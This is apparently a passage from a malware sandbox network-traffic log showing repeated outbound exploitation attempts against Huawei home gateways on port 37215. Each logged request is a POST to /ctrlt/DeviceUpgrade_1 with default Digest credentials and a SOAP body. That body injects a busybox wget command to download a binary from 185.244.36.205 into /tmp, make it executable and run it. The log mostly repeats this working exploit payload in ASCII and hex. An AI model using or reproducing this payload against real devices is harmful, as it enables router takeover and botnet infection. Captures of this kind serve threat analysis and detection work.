                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2455192.168.2.154861094.240.174.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477560043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2456192.168.2.1550836181.240.3.3237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477581978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2457192.168.2.1559870181.100.223.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477592945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2458192.168.2.1555492121.83.50.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477916956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2459192.168.2.1543786138.183.154.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477940083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2460192.168.2.154475437.58.55.9837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477966070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2461192.168.2.1550568121.64.183.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478013039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2462192.168.2.1550352197.155.220.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478063107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2463192.168.2.1533022138.179.123.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478075027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2464192.168.2.155801845.212.234.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478100061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2465192.168.2.1552678138.249.249.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.478111029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
